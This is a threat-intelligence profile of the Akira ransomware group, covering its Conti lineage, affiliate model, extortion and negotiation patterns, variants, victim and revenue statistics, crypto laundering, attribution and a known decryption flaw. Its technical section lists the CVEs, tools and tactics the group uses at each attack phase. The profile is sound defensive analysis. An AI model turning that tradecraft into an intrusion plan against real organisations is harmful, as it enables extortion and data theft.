RansomwareEDP  /  Threat Actor Library
Developed by Reno  •  Analytical profiles compiled from open-source intelligence
Threat Actor Profile — Last updated May 2026
Akira
Ransomware-as-a-Service  •  Double Extortion  •  Conti Diaspora
Critical Threat Fully Operational RaaS
First Observed
Mar 2023
39+ months active
Total Victims LIVE
1,492
As of May 2026
Countries Targeted LIVE
71+
Via ransomware.live
Confirmed Revenue
$244M+
Through Sep 2025
2025 Revenue
$150M
#1 by proceeds, 2025
LE Disruptions
Zero
No takedowns, no sanctions
Lineage
Conti
Wizard Spider diaspora
01

Overview

Akira is a Russian-nexus ransomware operation that emerged in March 2023 as part of the post-Conti diaspora. Operating as a Ransomware-as-a-Service (RaaS) enterprise, the group employs double extortion: data is exfiltrated prior to encryption, creating two independent leverage points against victims. Within its first year, Akira claimed over 250 victims and extracted approximately $42 million in ransom payments. By late 2025, it had become the single most prolific ransomware strain by annual revenue.

The group is tracked across the threat intelligence community under multiple aliases. No infrastructure takedown, domain seizure, or law enforcement operation targeting Akira specifically has been publicly announced as of May 2026.

AttributeDetail
Tracking aliasesPUNK SPIDER (CrowdStrike), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), Howling Scorpius (Unit 42)
LineageConti diaspora — shared heritage with Wizard Spider / Gold Ulrick (the parent Conti organization); not itself designated Wizard Spider
Operational modelRansomware-as-a-Service; closed RaaS with central operator control
Extortion mechanicDouble extortion (encryption + data publication threat); also offers decryption and deletion as separate purchasable options
Assessed jurisdictionRussia / post-Soviet region (CREDIBLE)
LE disruption statusNone confirmed as of May 2026
Data Leak Site & Branding
02

Origin & Lineage

Emergence

Akira was first observed in March 2023, with the earliest leak site discovery dated April 26, 2023. It is assessed as unrelated to a prior strain that used the same name and .akira extension in 2017. The group name is assessed as a likely allusion to the 1988 Japanese animated film of the same name (ANALYST INFERENCE; no authoritative confirmation).

Akira emerged precisely during the window in which Conti affiliates required new operational infrastructure following Conti's May 2022 public dissolution. The timing aligns with the documented dispersal of Conti personnel into successor operations including Black Basta (April 2022), BlackByte, Karakurt, Royal/BlackSuit, and Akira.

Assessed Origin
Credible — multiple independent source types converge

TRM Labs assesses Akira's developers are located in Russia or the broader post-Soviet region, citing non-VPN IP observations tied to Russia and Russian-language operator communications on dark web forums. S-RM Intelligence corroborates this assessment. The Canadian Centre for Cyber Security assessed Akira as "very likely connected" to former Conti personnel. No founding member or leadership identity has been publicly confirmed.

Conti Lineage: Four-Pillar Evidence Assessment

Attribution to former Conti / Wizard Spider personnel rests on four independent evidentiary pillars. Wizard Spider is CrowdStrike's tracking designation for the Russia-based eCrime group that operated TrickBot, Ryuk, and Conti as sequential campaigns. Secureworks tracks the same core cluster as Gold Ulrick.

Pillar 1 — Confirmed
Blockchain Forensics
Arctic Wolf Labs traced three separate Bitcoin transactions in which Akira operators sent proceeds totaling over $600,000 directly to wallet addresses previously associated with Conti/Wizard Spider leadership. TRM Labs confirmed overlapping on-chain infrastructure. This is the strongest evidentiary pillar.
Pillar 2 — Credible
Code and Behavioral Signatures
Avast Threat Labs concluded Akira's encryptor creators were "at least inspired by" leaked Conti sources, noting similarities in string obfuscation, encryption routines, and extension exclusion lists. Caveat: because Conti source code was publicly leaked February 2022, code overlap alone does not prove personnel continuity.
Pillar 3 — Confirmed (presence) / Credible (interpretation)
Language Artifacts
Akira affiliates communicate in Russian on dark web forums. The binary contains a hard-coded check for Russian keyboard layout but does not halt execution when detected — a deliberate deviation from standard CIS-exclusion behavior that may be intended to obscure attribution.
Pillar 4 — Credible
Temporal & Operational Context
Akira emerged in March 2023 — precisely when Conti affiliates required new infrastructure post-dissolution. Analyst1 (February 2026) describes the post-Conti network as "a loose federation of rebranded cells sharing tooling and infrastructure rather than a unified hierarchy."
Overall assessment: Akira is most accurately described as part of the Conti/Wizard Spider diaspora — a separate operational entity staffed by former Conti-affiliated operators carrying shared TTPs, laundering infrastructure, and operational playbook. It is not Conti rebranded in the formal sense. The Wizard Spider core operator tier is assessed as having moved primarily into Royal/BlackSuit; Akira represents affiliate and mid-tier operator continuity with leadership-level financial linkage through the blockchain evidence.
Vendor Tracking Designations: Disambiguation

Wizard Spider (CrowdStrike) and Gold Ulrick (Secureworks) designate the core Russia-based criminal organization that operated TrickBot, Ryuk, and Conti. Neither designation has been extended to Akira or any specific Conti successor group. They describe shared heritage, not operational identity.

Akira's own vendor-specific tracking designations are: PUNK SPIDER (CrowdStrike, first flagged April 2023, defined as the Big Game Hunting adversary responsible for developing and maintaining Akira ransomware), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), and Howling Scorpius (Palo Alto Unit 42).

The Royal/BlackSuit branch is tracked separately by CrowdStrike as ROYAL SPIDER, confirming organizational separation between the two major post-Conti successor streams. Secureworks maintains a parallel separation: GOLD SAHARA covers Akira while a distinct designation covers the Royal/BlackSuit lineage. The practical implication: Wizard Spider and Gold Ulrick are correct as shared heritage designators for the parent organization, but the operational aliases for Akira itself are exclusively PUNK SPIDER, GOLD SAHARA, Storm-1567, and Howling Scorpius.

03

Operational Model

RaaS Structure

Akira operates as a closed RaaS enterprise (Unit 42 characterization). The affiliate revenue split is not publicly confirmed; Blackpoint Cyber assesses an 80/20 split (80% affiliate, 20% operator) consistent with the modern RaaS standard. S-RM Intelligence notes that Akira maintains control over ransom demands and the discounts affiliates can offer, indicating operator-side leverage even when affiliates conduct individual attacks. The affiliate pool is heterogeneous: S-RM observed "considerable variation in tooling and methodologies among different Akira affiliates."

TRM Labs' on-chain analysis confirms that early payment flows (2023) can be grouped by likely affiliate based on consistent wallet behaviors, providing the clearest structural evidence of the affiliate layer.

Double Extortion Mechanic

Akira employs a sequential extortion model:

  • Exfiltration first: Data is exfiltrated prior to encryption. In some 2025 incidents, exfiltration completed within two hours of initial access.
  • Encryption extortion: Victims must pay for decryption keys to restore systems.
  • Publication threat: Victims must pay separately to prevent data publication on Akira's Tor-based Dedicated Leak Site (DLS).
  • Disaggregated payment option: Akira uniquely offers victims the ability to pay for decryption or data deletion separately — a tactic to lower the payment threshold for victims with functional backups.

Beginning in early 2024, Akira temporarily abandoned encryption entirely, focusing on exfiltration-only extortion — assessed by Cisco Talos as reflecting developer retooling time for a new encryptor. Full double extortion resumed by mid-to-late 2024.

Negotiation Behavior

Negotiation is conducted through a TOR-based portal accessed via a unique ID from the ransom note. Ransomware.live has archived 61 negotiation chat logs spanning May 2023 through April 2025.

Avg. Demand Reduction Internal
62.1%
Off initial demand (Q4 2023, n=10)
Median Reduction Internal
52.7%
Range: 37.5% to 96.0%
Avg. Days to Payment Internal
22 days
Median: 21 days — min 1, max 63
Attack to Publication
54.5 days
Average per ransomware.live
Analytical note: Internal data from Q4 2023 shows negotiation reductions ranging from 37.5% to 96.0% off initial demand — including a $10M initial demand settled at $400K (96% reduction) and a $3M demand settled at $250K (91.7% reduction). This data challenges the claim that "operators maintain tight control over the floor." In practice, the floor is highly flexible under sustained negotiation pressure.
  • Negotiations begin promptly, often within hours of encryption deployment
  • Operators demonstrate familiarity with victim financials (revenue, insurance coverage)
  • Ransom demands are set opportunistically based on victim profile
  • Publication threat escalates during stalled negotiations
04

Technical Profile

Malware Variants
VariantLanguageExtensionPeriodNotes
Akira v1C++.akiraMar–Jul 2023Initial release; Avast decryptor released Jun 2023
Akira v1 (patched)C++.akiraJul 2023+Fixed decryption flaw; ransom note: akira_readme.txt
MegazordRust.powerrangesAug 2023+Rust-based; deployed alongside C++ variants
Akira v2Rust.akira / .aki2023–2024Additional Rust variant; multiple extension variants
Akira (C++ return)C++.akiraSep 2024+Talos: reversion to C++ after retooling period
Encryption Scheme

Hybrid encryption: ChaCha20 stream cipher for file content, RSA-4096 for key protection. Provides speed (symmetric ChaCha20) while protecting keys asymmetrically, preventing brute-force recovery without the operator-held private key. Volume Shadow Copies (VSS) deleted via PowerShell/WMI to prevent recovery.

Hypervisor Targeting
  • VMware ESXi (April 2023+): Linux variant uses esxcli and vim-cmd to gracefully shut down VMs before encrypting virtual disk files.
  • Nutanix AHV (June 2025): First documented attack against Nutanix hypervisor environments. Directly encrypts .qcow2 files without native management commands.
  • Microsoft Hyper-V: Also targeted per updated CISA advisory.
Initial Access Methods
VectorNotes
VPN exploitation without MFADominant vector. Brute force, credential stuffing, or IAB purchase.
CVE exploitationPrimarily Cisco ASA/FTD and SonicWall. See CVE table below.
Remote Desktop Protocol (RDP)Stolen or brute-forced credentials
Spear phishingCredential harvesting
SSH exploitationRouter IP tunneling
Valid credentials (IAB purchase)~19.5% of Akira victims had infostealer infection in credential markets
Key CVEs Exploited
CVEProductCVSSType
CVE-2020-3259Cisco ASA/FTD7.5Information disclosure
CVE-2023-20269Cisco ASA/FTDN/AAuthentication bypass
CVE-2024-40766SonicWall SonicOS SSL-VPN9.3Improper access control
CVE-2024-37085VMware ESXiN/AAuthentication bypass
CVE-2023-27532Veeam Backup and ReplicationN/AMissing authentication
CVE-2024-40711Veeam Backup and ReplicationN/ADeserialization
CVE-2023-28252Windows CLFSN/APrivilege escalation
CVE-2022-40684Fortinet FortiOSN/AAuthentication bypass
Kill Chain Toolset
PhaseTools
DiscoveryAdvanced IP Scanner, BloodHound, Masscan, SharpHound, AdFind, SoftPerfect NetScan
Credential AccessMimikatz, LaZagne, Rubeus, SharpDomainSpray (Kerberoasting, LSASS dump)
PersistenceLocal/domain account creation (e.g., itadm), added to administrator group
Lateral MovementRDP, SSH, MobaXterm, Impacket (wmiexec.py), CrackMapExec, NetExec
C2 / Remote AccessAnyDesk, TeamViewer, MeshAgent, RustDesk, ScreenConnect; Ngrok/Cloudflared for tunneling
Defense EvasionPowerTool (Zemana driver abuse), EDR uninstall, POORTRY/BurntCigar BYOVD, log clearing
ExfiltrationFileZilla, WinSCP, RClone (to Mega), WinRAR, Temp.sh
05

Targeting

Sector Distribution (ransomware.live, May 2026)
SectorVictim CountNotes
Manufacturing352Largest single sector
Business Services313
Construction132
Technology129
Consumer Services96
Healthcare, Finance, Education, LegalSignificantNo formal sector exclusions documented

Dragos reported Akira linked to 83 industrial-sector incidents in Q1 2025 alone, representing approximately 12% of all tracked industrial ransomware activity that quarter. Between April 2024 and April 2025, the November 2025 CISA advisory documented Akira attacking 34 financial organizations. FinCEN identified Akira as the most-reported ransomware variant in Bank Secrecy Act filings for the 2022–2024 review period.

Geographic Distribution
CountryVictim Count% of Total
United States83055.6%
Canada775.2%
Germany674.5%
United Kingdom382.5%
Italy342.3%
Other (66 countries)44629.9%

No CIS-region victims documented in any open-source database. Country data from internal records (Q3 2025+) confirms US dominance with additional payments confirmed from Spain, Canada, Ireland, United Kingdom, and Australia.

Victim Profile and Selection Model

Primary profile: Small-to-medium enterprises (SMEs). S-RM Intelligence documented 86% of Akira victims have fewer than 1,000 employees.

Selection model: Primarily opportunistic, driven by available initial access (VPN exposure) rather than deliberate sector pre-selection. However, affiliates are assessed to exercise judgment in prioritizing targets with critical data dependencies, cyber insurance, and high operational disruption sensitivity.

06

Victim Data

Leak Site Victims
1,492
As of May 22, 2026
FBI-Confirmed Victims
342+
Through Nov 2025 advisory
Internal Case Records Internal
85
64 with confirmed payment
Data Leak Rate
23%
79 of 342 named victims (S-RM)
Quarterly Victim Volume
PeriodApprox. VictimsConfidence
Q2–Q4 2023~250 (partial year)ANALYST INFERENCE for quarterly; CONFIRMED annual
2024 (full year)~430CREDIBLE (FBI advisory reference)
Jan 1–Dec 11, 2025~980CONFIRMED (TRM Labs)
Q1 2026~150+CREDIBLE; 84 in March alone (second most active month on record)
Notable Named Victims
VictimSectorDateNotes
Stanford UniversityEducationSep 202327,000 individuals notified
Nissan AustraliaAutomotiveJan 2024100,000 customers' data compromised
Tietoevry (Finland)IT ServicesJan 2024Major Finnish IT provider; disrupted multiple Swedish client systems
Lush Cosmetics (UK)Retail2023Confirmed victim
Toronto ZooPublic InstitutionJan 2024Canadian critical infrastructure
Stoli GroupFood and Beverage2024Evidence of strategic coordination (Halcyon)
07

Financial Profile

Documented Revenue
SourcePeriodAmountConfidence
FBI/CISA Joint Advisory (Apr 2024)By Jan 2024$42MConfirmed
FinCEN Financial Trend Analysis (Dec 2025)Apr 2023–Dec 2024$120.9M (376 BSA filings)Confirmed
FBI/CISA Updated Advisory (Nov 2025)Through Sep 2025$244.17MConfirmed
TRM Labs Intel Library2025 full year$150MConfirmed

Akira was identified as the most prolific ransomware strain by total ransom proceeds in 2025, collecting $150M, nearly twice the second most active strain. FinCEN named Akira the most-reported variant in BSA data for the 2022–2024 review period.

Payment Profile Internal Data — 85 cases
Median Payment
$200,000
Confirmed (n=64 payments)
Mean Payment
$423,851
Confirmed (n=64 payments)
Minimum
$43,000
Confirmed
Maximum
$3,000,000
Confirmed
Total Confirmed Paid
$27.1M
64 confirmed payments
Wallet Type
100%
Bitcoin (bc1 SegWit) across all records

Published demand range (open source): $200,000 to over $4 million USD. Demands set opportunistically based on victim financial profile, insurance coverage, and assessed data value.

Laundering Infrastructure: Four Documented Phases
I
2023 — Affiliate-Level Clustering
Payment flows grouped by affiliate based on consistent on-chain behaviors, including reused intermediary addresses. Maximum on-chain visibility for attribution purposes.
II
Early–Mid 2024 — WanChain Bridge Centralization
Shift to centralized laundering via WanChain bridge. Most victim payments funneled through a single WanChain address before dispersal to multiple global VASPs for cash-out.
III
Late 2024 — Defiway Bridge
Transition to Defiway bridge. Critically, Fog ransomware used the same Defiway approach during this period — providing on-chain evidence of infrastructure sharing or operational cooperation between Akira and Fog.
IV
August 2025–Present — Per-Victim Addresses + HTX
Each payment passes through a unique intermediary address, then aggregates across two consolidation addresses, before off-ramping at HTX (formerly Huobi). Admin-affiliate revenue split occurs only after funds reach the shared VASP cash-out address, keeping the split opaque on-chain.
Connected group signal (Akira-Fog: CONFIRMED): Chainalysis (2025 Crypto Crime Report) confirmed Akira and Fog employed identical laundering methods distinct from all other ransomware strains. Arctic Wolf documented shared IP infrastructure between Akira and Fog affiliates in late 2024. Sophos X-Ops designated the combined Akira-Fog activity as STAC 5881 (Sophos Threat Activity Cluster 5881), characterizing the two groups as operating within a unified affiliate infrastructure sharing initial access methods, credential abuse patterns, and on-chain laundering tradecraft. The Akira-Fog connection does not require single-operator control; evidence points to deliberate infrastructure sharing at the affiliate layer.
08

Attribution & Nexus

Assessed Jurisdiction
Credible — Russia or broader post-Soviet region

Evidence basis: Russian-language operator communications on dark web forums; non-VPN IP observations tied to Russia; wallet infrastructure overlapping with Conti-affiliated addresses tied to formally sanctioned Russia-based operators. No contradicting evidence in open source.

CIS Exclusion Behavior
Confirmed — No keyboard-layout kill switch present in binary

The Akira binary does not contain the standard kill switch that halts execution when a Russian keyboard layout is detected — a deliberate deviation from virtually all other Russian-linked ransomware families. Despite the absence of the technical safeguard, no CIS-region victims appear in any open-source database.

ANALYST INFERENCE: Operator-level targeting guidance to affiliates produces the same CIS-exclusion outcome through a different mechanism. The absence of the technical kill switch may be a deliberate choice to obscure Russia-origin attribution while achieving the same practical result.
Arrests and Named Individuals
As of May 2026: No indictments, OFAC sanctions, or criminal charges have been publicly filed against any member of Akira's core operating team. TRM Labs (March 2026) states explicitly that Akira has not been subject to OFAC sanctions, criminal indictments, or a law enforcement disruption operation.

One confirmed arrest is tied to the Conti organizational entity that operated Akira:

AttributeDetail
IndividualDeniss Zolotarjovs, 35, Latvian national residing in Moscow
ArrestGeorgia (country), December 2023
TransferU.S. custody, August 2024
OutcomePleaded guilty July 2025; sentenced 102 months (8.5 years), May 3, 2026
RoleRansom negotiation escalator; weaponized sensitive personal data (including children's health records) to pressure non-paying victims
ScopeJune 2021–August 2023; 54+ companies; $56M+ documented losses across 13 confirmed victims
Critical nuanceInvolvement predates Akira's March 2023 standalone emergence. Prosecution covers organizational continuity between the Conti-led parent entity and Akira as a successor brand — not Akira-specific post-2023 activity.

DOJ sentencing documents explicitly name Akira as one of the brands used by a Conti-led organization whose members "included multiple former Russian law enforcement officers" who "co-opted Russian government databases and law enforcement connections." The organization also paid bribes to exempt members from military conscription and maintained a structured presence in St. Petersburg.

Russian Intelligence Services Nexus Assessment
Analyst Inference — No confirmed direct RIS nexus. Ecosystem-level intelligence-adjacent relationships documented at organizational level.

No publicly confirmed direct tasking or control relationship between Akira's operators and Russian state intelligence services (FSB, SVR, or GRU) exists as of May 2026. However, the post-Conti/Wizard Spider ecosystem has documented intelligence-adjacent relationships:

  • Recorded Future Dark Covenant 3.0 (October 2025): Leaked Conti communications show senior Conti figures provided data to both GRU and SVR. One operator ("Professor") maintained a paid informant or bribery relationship with SVR contacts.
  • Vitalii Kovalev (Conti alias: Stern/Bentley): Assessed by German BKA and confirmed via leaked Qakbot developer chats as "linked to the FSB."
  • DOJ sentencing documents (Zolotarjovs): Organization described as including "multiple former Russian law enforcement officers" who "co-opted Russian government databases."
Framework assessment (Recorded Future): Russia's posture toward groups like this is characterized as "conditional controlled impunity" — not uniform protection, but a managed market where groups useful to the state are insulated while peripheral facilitators are sacrificed under Western pressure. Given Akira's financial scale ($244M+) and Wizard Spider heritage, it fits the category that would receive insulation rather than exposure. A protection relationship should be treated as likely but unconfirmed pending source-level intelligence.
09

Disruption History & Known Vulnerabilities

Avast Decryptor (June 2023)

The only confirmed technical disruption action: Avast released a free decryptor on June 29, 2023 targeting the original C++ Windows variant. Akira patched the encryption flaw within four days (July 2, 2023), demonstrating active development capacity. A Rust-based Megazord variant followed in August 2023. No publicly released decryptor exists for any subsequent Akira variant as of May 2026.

Tinyhack GPU Brute-Force Method (March 2025)
Exploitable technical vulnerability confirmed for Linux/ESXi variant (2024). Patch status not confirmed in open source as of May 2026.
AttributeDetail
Root causegenerate_random() calls get_current_time_nanosecond() as seed — insufficiently random. Passed through 1,500 rounds SHA-256 via Yarrow256 PRNG.
Attack methodKnown-plaintext attack against VMware file headers (flat-VMDK, sesparse, NVRAM). ESXi timestamps constrain the search space.
Search space~4.5 quadrillion pairs — practical with GPU acceleration
Practical cost16 x RTX 4090 GPUs (cloud-rentable); ~10 hours recovery time; ~$261 per second-range searched
StatusFull source published to GitHub (March 2025). Patch status unconfirmed.
Government Advisories
  • April 18, 2024 (AA24-109A): FBI, CISA, Europol EC3, Netherlands NCSC-NL. Original advisory covering TTPs and IOCs through February 2024.
  • November 13, 2025 (AA24-109A Rev.): FBI, CISA, DC3, HHS, Europol EC3, France OFAC, Germany LKA-BW, Netherlands NCSC-NL. Added Nutanix AHV targeting, expanded CVE list including SonicWall CVE-2024-40766.

Both advisories constitute information operations (victim notification, IOC sharing) rather than direct disruption. No infrastructure seizures or arrests resulted.

No Infrastructure Takedown
Confirmed — Zero law enforcement disruption events as of May 2026

Akira has operated for over 39 months without a direct law enforcement disruption event, making it one of the most durable major ransomware operations in the post-Conti period. No WAIS-scoreable events on record.

Operational Vulnerabilities
  • Geographic exposure: Zolotarjovs arrest in Georgia demonstrates that travel outside Russia to non-extradition-treaty countries is an exploitable exposure point.
  • On-chain attribution: Centralized laundering infrastructure (Defiway, WanChain, HTX) creates durable attribution opportunities. TRM Labs has successfully grouped affiliate payment flows through wallet cluster analysis and identified the primary cash-out exchange.
  • Affiliate trust fragmentation: Recorded Future documented increasing affiliate disputes across the RaaS ecosystem post-Operation Endgame, including non-payment scams — a pattern affecting Akira's peer groups and a potential OPSEC exposure vector.
10

Status & Trajectory

Fully Operational. Akira's leak site was last accessed May 23, 2026 with victims posted as recently as May 22, 2026. In April 2026, Qilin surpassed Akira as the most active group for that month — Akira remains closely behind at roughly the same activity level as March.
Total Victims
1,492
71 countries, May 2026
2025 Victims
~980
Jan 1–Dec 11, 2025
YoY Volume Change
+120%
2024 to 2025
Strife Events
Zero
No rebranding, fragmentation signals
Trajectory Assessment
Analyst Inference — Continued high-tempo operations at or above 2025 levels

All trajectory indicators are uniformly expansionary: volume rising, revenue rising, geographic expansion continuing, capability expanding (Nutanix AHV added June 2025, kill chain accelerating to sub-4 hours per Halcyon April 2026), and laundering sophistication increasing through four phase rotations in three years.

The absence of any law enforcement disruption event combined with rising revenue and victim volume suggests Akira has established a durable operational posture. The broader TRM-identified cluster (Fog, Frag, Anubis sharing laundering infrastructure) suggests Akira may function as an operational hub anchoring a wider affiliate ecosystem — consistent with a mature RaaS structure where high-trust affiliates work across multiple brands simultaneously.

CONFIRMED — Akira-Fog cluster: Arctic Wolf shared IP infrastructure; TRM Defiway bridge sharing; Sophos STAC 5881 designation. Evidence is multi-source and independent.
CREDIBLE — Frag-Akira relationship: TRM Labs assessed Frag as a potential Akira extension based on shared wallet clusters and identical bridge infrastructure. Sophos X-Ops and Agger Labs characterize Frag as a technique-sharing actor rather than a direct Akira extension. BlackFog tracks Frag as independent. Neither Mandiant nor Recorded Future have published a formal assessment. TRM on-chain evidence supports affiliation-level overlap; organizational integration is not established.

Recent Reporting LIVE

Open-source reporting from monitored threat intelligence sources. Refreshed automatically every 8 hours via ransomware.live and major TI blog feeds. Authored analysis above is unaffected by this feed.

Loading recent reporting…

Sources

Primary Government Sources
[1]FBI/CISA/EC3/NCSC-NL Joint Advisory AA24-109A, April 18, 2024 — ic3.gov
[2]FBI/CISA Updated Advisory AA24-109A Rev., November 13, 2025 — ic3.gov
[3]FinCEN Financial Trend Analysis on Ransomware, December 2025 — fincen.gov
[4]Canadian Centre for Cyber Security: Ransomware Threat Outlook 2025–2027 — cyber.gc.ca
[5]DOJ: Member of Prolific Russian Ransomware Group Sentenced, May 2026 — justice.gov
Threat Intelligence Reports
[6]TRM Labs: Akira Ransomware Threat Profile (March 2026) — trmlabs.com
[7]TRM Labs: New Disruption Opportunities in the Evolving Ransomware Ecosystem (April 2026) — trmlabs.com
[8]Recorded Future: Dark Covenant 3.0 (October 2025) — recordedfuture.com
[9]CybelAngel: Akira Ransomware — The Conti Successor Targeting the West (April 2026) — cybelangel.com
[10]Palo Alto Unit 42: Threat Assessment Howling Scorpius (December 2024) — unit42.paloaltonetworks.com
[11]Cisco Talos: Akira Ransomware Continues to Evolve (October 2024) — talosintelligence.com
[12]S-RM Intelligence: Ransomware in Focus: Meet Akira (October 2024) — s-rminform.com
[13]Dragos: Industrial Ransomware Analysis Q1 2025 — dragos.com
[14]Chainalysis: 2025 Crypto Crime Report
[15]Tinyhack: Decrypting Akira Linux/ESXi Variant Using GPUs (March 2025) — tinyhack.com
[16]Arete: Ransomware Trends and Data Insights March 2026 — areteir.com
Victim and Financial Data
[17]Ransomware.live: Akira Group Profile (accessed May 2026) — ransomware.live
[18]Internal data — 85 confirmed case records, 2023 Q2 through 2026 Q1